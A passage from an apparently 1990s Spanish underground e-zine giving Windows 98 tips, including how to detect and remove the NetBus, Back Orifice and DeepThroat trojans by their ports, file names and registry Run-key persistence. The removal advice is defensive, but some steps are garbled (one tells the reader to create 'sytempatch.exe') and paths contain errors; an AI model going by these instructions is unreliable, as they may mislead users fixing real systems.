Bién esos famosos paquetes, lo unico que hacen es tocar el registro de Windows (y a veces "destrozan" mas de lo que hacen), el parametro de la MTU y asociados, para intentar ajustar el tamaño de paquete. No lo suelen hacer mal, excepto en el caso de que ademas de conectarnos via modem, tengamos una red interna mediante tarjeta de red y utilicemos tambien en nuestra red el TCP/IP. En este caso nos pueden hacer destrozos.

Windows 98 nos da facilidades para manejar esto, sin necesidad de acudir a estos "bastante peligrosos" paquetes.

Windows 98 incluye la posibilidad de modificar el tamaño del paquete.
Para esto en Panel de Control->Red->Adaptador de acceso telefonico, en "Avanzado", tenemos el parametro "Tamaño del paquete IP", y podemos
seleccionar los tres valores de: pequeño, mediano y grande.
Solo nos queda probar. Y ademas tenemos la garantia de que esto afectará unicamente a nuestra conexion telefonica, y no a nuestra posible red TCP.


*Como detectar el virus NetBus en nuestro sistema.

Para comprobar si tienes instalado el servidor de NetBus en tu sistema, emplea el "NETSTAT" :

NETSTAT -an

Si te responde algo como "12345", será la prueba de que esta instalado.
Para eliminarlo:
Borraremos el programa servidor que por defecto es "patch.exe" aunque puede tomar cualquier nombre.
Ejecutamos Regedit.exe y entramos en la clave

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Una vez encontrado el ejecutable lo ejecutaremos con el parametro "/remove".
Reiniciar el sistema.


*Como detectar el virus Back Orifice en nuestro sistema.

Para comprobar si tienes instalado el BO en tu sistema, emplea el "NETSTAT" para verificar las conexiones UDP abiertas, ejecuta la orden siguiente:

NETSTAT -an

Si te responde algo como "0,0,0,0:31337 *.*, será la prueba de que tienes instalado el servidor de Back Orifice en tu ordenador.
El ejecutable de BO mide 124.928 bytes, al ser ejecutado se borra de forma automatica y crea una copia de si mismo en el subdirectorio windows\system como *.exe y un archivo windll.dll de 8.192 bytes, depues se mete en el registro del sistema para ejecutarse cada vez que se inicia Windows.
Para eliminarlo:
Borraremos el *.exe y el windll.dll.
Ejecutamos Regedit.exe y entramos en la clave

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Currentversion\Runservices

Se eliminara la referencia existente al *.exe
Reiniciar el sistema.


*Como detectar el virus DeepThroat.

Para comprobar si tienes instalado el servidor de DeepThroat en tu sistema, emplea el "NETSTAT", crea un fichero de nombre "sytempatch.exe" :

NETSTAT -an

Si los puertos "2140" o "3150" son listados podemos tener la certeza de que tenemos el servidor.


Para eliminarlo:
1- Ejecutamos Regedit.exe y entramos en la clave.

HKEY_LOCAL_MACHINE\Sofware\Windows\CurrentVersion\Run

2- Buscamos y borrar la clave SystemDLL32 con el valor systempatch.exe, es la ruta completa la servidor.

3- Localizar el programa marcado por la ruta y borrarlo.

4- Reiniciar el sistema.


*Como redirigir Windows.

Como ya habras visto cuando guarda, inicias , etc, Windows siempre te lleva a unas carpetas determinadas, como:

C:\Mis documentos 
C:\WINDOWS\Menz Inicio\Programas 
C:\WINDOWS\SendTo 
C:\WINDOWS\Menz Inicio 
C:\WINDOWS\Favoritos 
C:\WINDOWS\Temporary Internet Files\ 
etc.

Si quieres modificar estos caminos para que tus ficheros se guarden en sitio diferente, hazlo en la clave del registro:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

*Como restaurar copias de registros de Windows antiguos.

Windows 98 hace cada dia una copia del registro del sistema, esto lo utiliza por si hubiera un fallo del registro.

En este caso Windows se limita a poner la copia creada mas reciente.
También podemos hacer una copia cuando queramos, utilizando el programa SCANREGW.EXE el cual nos explorara el registro en busca de fallos.

Si queremos restaurar una copia mas antigua, lo haremos así:

Arrancar el sistema dejando pulsada la tecla CONTROL.
Una vez que salga el menu de de inicio, elegir la opción n:5.
Escribir desde el símbolo de sistema la orden

scanreg /restore

Esto visualizara una lista en donde te dejara elegir que copia deseas restaurar.
Selecciona una y pulsa retorno.
Recuerda que todos los cambios realizados desde esa fecha los perderás.

DESPEDIDA

SudHack

Bueno, agradezo que hallas llegado hasta aca (capaz no llegaste y leiste esto solo :S)
Espero, que sepas apreciar, lo "poco" que ayudamos en el mundo underground, ya que esta comunidad todavia esta en "pañales" falta mucho por crecer, y nos falta mucho para dar.
Nuevamente pido perdon por el retraso de la e-zine pero como ya dije, no queria bajar el nivel de la misma.

Recuerda que si tenes alguna duda nos podes escribir y que si queres colaborar con la e-zine, en los textos o en lo que quieras puedes escribirnos, estariamos muy contentos de que lo hagas :D

Bueno, vasta de despedidas
ME PONEN MELANCOLICO :'(

Nos vemos.......
HASTA EL PROXIMO N⁄MERO!!!!!!!!!!!!!!

← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
5 Oct 2024
To make your experiment comparable - you needed to wrap the body with an outer winding strip (most likely 3 inches by 14 feet - the sidestri ...
guest's profile picture
@guest
29 Sep 2024
은잡지보고 왔습니다! 재밌네요ㅋㅋ
guest's profile picture
@guest
27 Sep 2024
유튜브 보고 왔어요 Thank you for your report! Very interesting
Francesco's profile picture
Francesco Arca (@Francesco)
27 Sep 2024
Yes :)
AniphaeS's profile picture
@AniphaeS
26 Sep 2024
It looks like you spent all day long playing videogames XD
guest's profile picture
@guest
25 Sep 2024
The suggestion to let the sauce sit overnight for enhanced flavor is a great tip!
guest's profile picture
@guest
24 Sep 2024
Gemini is a new protocol but it clearly demonstrates great potential. In the future, it could overtake HTTP.
AniphaeS's profile picture
@AniphaeS
23 Sep 2024
Indeed! It is really powerful its power!
Adelaide's profile picture
@Adelaide
23 Sep 2024
Esatto
guest's profile picture
@guest
23 Sep 2024
nature is amazing
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT